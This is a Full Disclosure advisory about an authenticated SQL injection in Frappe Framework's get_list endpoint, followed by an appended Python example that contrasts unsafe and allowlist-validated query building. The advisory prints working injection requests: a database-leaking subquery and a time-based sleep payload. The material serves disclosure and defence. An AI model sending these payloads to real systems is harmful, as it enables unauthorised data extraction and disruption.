Message-Id: <2D44FEA4-617A-4CDB-AFA0-E65D8B9746C8@gmail.com>
Date: Tue, 27 May 2025 17:04:14 -0400
From: Ron E <ronaldjedgerson@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Structured Query Language Injection in frappe.desk.reportview.get_list Endpoint in Frappe Framework

An authenticated SQL injection vulnerability exists in the frappe.desk.reportview.get_list API of the Frappe Framework, affecting versions v15.56.1. The vulnerability stems from improper sanitization of the fields[] parameter, which allows low-privileged users to inject arbitrary SQL expressions directly into the SELECT clause.

Sample Structured Query Language Injection:

Request:

GET /api/method/frappe.desk.reportview.get_list?fields=%5B%22salary_component_abbr%2c(SELECT%20database())%20AS%20current_db%22%5D&doctype=Salary%20Component&limit=20&_=1748066407934 HTTP/2
Host: --host--
Cookie: ******
--snip--

Response:

HTTP/2 200 OK
{"message":[{"salary_component_abbr":"H***","current_db":"_**************"},
--snip--

Time-based attack:

Request:

GET /api/method/frappe.desk.reportview.get_list?fields=[%22salary_component_abbr%2c(select*from(select(sleep(200)))a)%22]&doctype=Salary%20Component&limit=20&_=1748066407933 HTTP/2
Host: --host--
Cookie: ******
--snip--

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
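The root cause the advisory names is that each element of the fields[] list reaches the SELECT clause verbatim, so one element can smuggle a whole subquery. The following is an added illustration, written for this archive page and not code from the advisory author or from the Frappe project: it contrasts a query builder that concatenates field strings (the weak pattern described above) with one that only accepts a known column name, optionally aliased, and it runs both over the two request lines quoted in the post. The column allowlist, the regular expression and the helper names are assumptions for the example; the only thing taken from Frappe is its `tab<DocType>` table naming convention.

```python
import json
import re
from urllib.parse import parse_qs, urlsplit

# Constructed allowlist standing in for the columns a DocType exposes;
# the real Frappe metadata lookup is not modelled here (assumption).
ALLOWED_COLUMNS = {
    "Salary Component": {"name", "salary_component", "salary_component_abbr"},
}

# A single field entry may be a bare identifier or "identifier AS alias".
# Commas, parentheses, quotes and operators cannot match, so subqueries are rejected.
FIELD_RE = re.compile(
    r"^\s*([A-Za-z_][A-Za-z0-9_]*)(?:\s+(?:AS\s+)?([A-Za-z_][A-Za-z0-9_]*))?\s*$",
    re.IGNORECASE,
)


def fields_from_request_line(request_line):
    """Extract the doctype and the JSON-decoded fields list from a
    'GET /path?query HTTP/2' request line (percent-decoding included)."""
    target = request_line.split()[1]
    qs = parse_qs(urlsplit(target).query)
    doctype = qs["doctype"][0]
    fields = json.loads(qs["fields"][0])
    return doctype, fields


def build_select_unsafe(doctype, fields):
    """Weak pattern from the advisory: field strings are joined into the
    SELECT list unchanged, so 'col,(SELECT database()) AS x' lands in the SQL."""
    return "SELECT {} FROM `tab{}`".format(", ".join(fields), doctype)


def validate_fields(doctype, fields):
    """Return [(column, alias_or_None), ...] or raise ValueError for anything
    that is not a known column of the DocType."""
    allowed = ALLOWED_COLUMNS.get(doctype)
    if allowed is None:
        raise ValueError(f"unknown doctype: {doctype!r}")
    if not isinstance(fields, list) or not fields:
        raise ValueError("fields must be a non-empty JSON list")
    cleaned = []
    for entry in fields:
        if not isinstance(entry, str):
            raise ValueError("field entries must be strings")
        m = FIELD_RE.match(entry)
        if not m:
            raise ValueError(f"rejected field expression: {entry!r}")
        column, alias = m.group(1), m.group(2)
        if column not in allowed:
            raise ValueError(f"unknown column: {column!r}")
        cleaned.append((column, alias))
    return cleaned


def build_select_safe(doctype, fields):
    """Hardened builder: only validated identifiers reach the SELECT list,
    each backtick-quoted, and the doctype has been checked against the allowlist."""
    cols = validate_fields(doctype, fields)
    parts = [f"`{c}`" + (f" AS `{a}`" if a else "") for c, a in cols]
    return "SELECT {} FROM `tab{}`".format(", ".join(parts), doctype)


def classify(request_line):
    """('accepted', sql) when the hardened builder takes the request,
    ('rejected', reason) when validation refuses it."""
    doctype, fields = fields_from_request_line(request_line)
    try:
        return ("accepted", build_select_safe(doctype, fields))
    except ValueError as exc:
        return ("rejected", str(exc))


# The two request lines quoted in the advisory, plus one constructed benign request.
INJECTED_REQUEST = ("GET /api/method/frappe.desk.reportview.get_list?fields=%5B%22salary_component_abbr"
                    "%2c(SELECT%20database())%20AS%20current_db%22%5D&doctype=Salary%20Component"
                    "&limit=20&_=1748066407934 HTTP/2")
TIMING_REQUEST = ("GET /api/method/frappe.desk.reportview.get_list?fields=[%22salary_component_abbr"
                  "%2c(select*from(select(sleep(200)))a)%22]&doctype=Salary%20Component"
                  "&limit=20&_=1748066407933 HTTP/2")
BENIGN_REQUEST = ("GET /api/method/frappe.desk.reportview.get_list?fields=%5B%22salary_component_abbr"
                  "%22%2C%22name%20AS%20component%22%5D&doctype=Salary%20Component&limit=20 HTTP/2")

if __name__ == "__main__":
    for label, req in [("injected", INJECTED_REQUEST), ("timing", TIMING_REQUEST), ("benign", BENIGN_REQUEST)]:
        doctype, fields = fields_from_request_line(req)
        print(label, "unsafe:", build_select_unsafe(doctype, fields))
        print(label, "hardened:", classify(req))
```

Running the script shows the unsafe builder emitting the subquery untouched for both quoted requests, while the hardened builder rejects them at the first comma and accepts only the constructed benign request. The same identifier check is a useful log-review heuristic: any fields= value whose JSON elements contain characters outside the identifier pattern deserves a look.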